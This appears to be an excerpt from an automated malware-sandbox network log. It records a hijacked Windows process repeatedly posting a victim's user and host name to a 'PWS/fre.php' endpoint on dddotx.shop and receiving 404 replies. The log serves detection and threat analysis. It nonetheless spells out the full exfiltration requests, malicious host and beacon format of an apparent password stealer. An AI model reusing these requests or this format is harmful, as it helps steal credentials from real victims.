              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q4Ib1Dyum34c2aj96wDdanhsrbSA%2FkLg8opE9Hkgy6JodCThkqucV59Vug0Nu6dzuzJkHf5tF2hAGPT6yUQyucz2KUTPGKYYLvlXGc3rlypLZ41QkYaGFv3x%2FDUePA%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c8997ef3b0443bb-EWR
              alt-svc: h3=":443"; ma=86400
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              67192.168.2.749772188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:20:11.157373905 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:20:11.162336111 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:20:11.812237024 CEST565INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:20:11 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=okb9Udb8ZV8JDRyozIa0EcLB0Yn%2BvpOrrVT1kMOJNqPRSCJ2sbpvVqYAQSLC76DAsDQYQBAZBew17PFT4jf8AkS4xTbq0AeEp2OL5SxgcfszIIA6lQ5lclgYnE6%2FPQ%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c8997f43ef94228-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              68192.168.2.749773188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:20:11.967433929 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:20:11.972431898 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:20:12.630415916 CEST565INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:20:12 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=spSKVEFIiqjwgjhlj70ZZwOYdXgnmVIBOTQAVQ1j1eNsAWQgTVnygcvp5f%2FcB1eYCpn6gui6fX8GcMtH2RA0oEIfy6jKh80Rw2zsPCjijMFGzKpccPrIDV%2FYRKIhCQ%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c8997f96949728d-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              69192.168.2.749774188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:20:12.779400110 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:20:12.784342051 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:20:13.435775995 CEST563INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:20:13 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UKdsOSoHwa8XDlSJhQ8HUD5v4heoErtpumv3kWTUdrHhrzq7VvI54z4ONpt%2BlsJhYqiFPAZzY0ERY5fkU7j9BLBwvgekdvW4MKVI9dyktT4mu4ALluoV1fp4V7nf2A%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c8997fe7afc4307-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              70192.168.2.749775188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:20:13.595252991 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:20:13.600308895 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:20:14.236275911 CEST597INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:20:14 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N5kJPnghWlPqYN%2FG2sLIwFQQ9j%2FXaOtzWjkxcyecEN1LUPpGwmlwNQqILmjw0DeLGrzI5WtJmrPAgzQwrXwB5UNAyhvLDhuKGX129KDJsrWtpmC%2BGJ2yQS8D0D65hQ%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c8998037c5e42be-EWR
              alt-svc: h3=":443"; ma=86400
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              71192.168.2.749776188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:20:14.386653900 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:20:14.393220901 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:20:15.051773071 CEST577INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:20:15 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1%2FzpQ2TxHBX58U%2F2j9wHbFXPIkhFElAYGDoYbB76Mdhdf5slrxCdRoOzq0GX%2Fckb60%2BkLJRJq%2Fogx8QOrGkn77BOKM2QxGEYTjVwD%2BtgSyeTN%2B3P2FBGugGsyPjd%2FQ%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c8998086b5242b7-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              72192.168.2.749777188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:20:15.199145079 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:20:15.204070091 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:20:15.897368908 CEST569INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:20:15 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=exIDN%2Bc1juZkq2l7SHWeE4dFsMPWY7dlOHEmbgkL5eZVO3uUkiD4%2BmtGj0XU8jekp56a57pcWcCbNyb8jPCwDemy5iqYrouoio9c52N%2FRI4zCPk7MRm1AB6%2BaQFiCA%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c89980d7cbe4235-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              73192.168.2.749778188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:20:16.041939020 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:20:16.046849012 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:20:16.724160910 CEST561INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:20:16 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qf9BVwq9lJP1p3l5cxisQr0x097hzsKEpAs3658NUVwHv3c3qHFminK2VK10V4ljr0Ye1pk2KCZqwu9etZVhuBHhAmuvuY403foqBGNUVc4Xn4pNpSHGr7mN3lf2GQ%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c899812cef243cf-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              74192.168.2.749779188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:20:16.870119095 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:20:16.874999046 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:20:17.550465107 CEST565INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:20:17 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MD1XFttmi9rrwNMjXikA2KqqdgxQtUYC17QyVOMs7N%2FwpyIbt%2BIwlzmwlr7bli14QCiVobOhewEmFuhWK2RhGNL7DkNaagMQUB43k1VfJJoBXTRC04KchtRSgeIWRA%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c899817ed5043a3-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              75192.168.2.749780188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:20:17.696146011 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:20:17.701123953 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:20:18.430228949 CEST567INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:20:18 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HPwad%2FrGWuUKgQ7nIaCZyyDp9MNTaFXBtxdaNp%2BCOfeURqHaLrj5g3yx4V5l7Og4wrhmfxNiOt%2B1Z2kyfoQKHpy554Xeo6CCjUuKvdef22DfYf70h6Bovm1p8dp1aA%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c89981d29dc43dd-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              76192.168.2.749781188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:20:18.572189093 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:20:18.577127934 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:20:19.235716105 CEST573INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:20:19 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7FX%2FObk%2FJqP%2FGnkHcs7if9jUtHdliW50%2F6VF7%2FTIuan68OIFUxSklFkWOQaJKiSy4gF88WPrkslEnNd8vkEyImbAqhacqO2Co%2BjNnFob3a0qbeaplWJ5XcLV7f7MVw%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c89982298bb43f8-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              77192.168.2.749782188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:20:19.383768082 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:20:19.388645887 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:20:20.044056892 CEST565INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:20:20 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hiImsrHdkqH7lfdKOXiVROhA4DdeNq%2BaghxFPvVAvXbUwiw4Gz7nBNzY9d0hjS7l9dRIinmV4hVrqZLbcjbyp0aBRVOLKjZQ5BImQWqf8oE7KkAsmZlH0E%2FUKWbEag%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c899827af6541f9-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              78192.168.2.749783188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:20:20.198115110 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:20:20.429527998 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:20:21.084366083 CEST565INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:20:21 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tYj01uITRSD0kXCg0qORYhZUr%2FPgrGDAZBROqs1QbvbUI1yGWE0JudnGXd208KbIuANKKWeza0uoKOhdCW904KOfiTCH9wKL8G0%2BBJBej2FfuYvfgEOYpklFQr3fbw%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c89982e3cfe4283-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              79192.168.2.749784188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:20:21.228310108 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:20:21.233232975 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:20:21.896749020 CEST571INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:20:21 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YnnDjkLacFGrsKn7CParT3zYaWHJolXgX6XqSXTfaui%2BE%2FtRBaVNxWsJ4%2BfIQfs2nxU7%2BgfeFBi9tR5y0iIKt%2Bjea3KZPv5WEAoBKjc7sCYqCWhgvA17H6cWmTThmA%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c8998333f1443a4-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              80192.168.2.749785188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:20:22.040514946 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:20:22.045367002 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:20:22.717554092 CEST563INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:20:22 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OJW0hvjKcJLkr2O9EjcYUHZI2v7p51pMOXf35ES42G%2Bhk90j7pXrl5AyLLmIJTESJtIJEtenziTdGtqQh2wlnEBPxl2qBI6SZzqiMpEDAbIXVw19JjK2jxkHpCGhzQ%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c8998385f7b0f9d-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              81192.168.2.749786188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:20:22.871623039 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:20:22.876652956 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:20:23.536905050 CEST567INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:20:23 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
